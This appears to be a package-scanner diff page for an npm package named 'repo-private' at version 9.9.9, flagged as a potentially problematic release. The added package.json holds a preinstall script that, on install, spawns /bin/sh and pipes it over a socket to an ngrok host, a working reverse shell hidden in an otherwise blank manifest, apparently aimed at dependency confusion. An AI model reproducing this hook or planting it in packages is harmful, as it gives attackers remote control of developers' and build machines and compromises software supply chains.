repo-private 9.9.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of repo-private might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "repo-private",
|
3
|
+
"version": "9.9.9",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node -e \"const { exec } = require('child_process'); const net = require('net'); const sh = exec('/bin/sh'); const client = new net.Socket(); client.connect(13140, '6.tcp.eu.ngrok.io', function() { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); sh.on('exit', function() { client.end(); });\""
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC",
|
11
|
+
"description": ""
|
12
|
+
}
|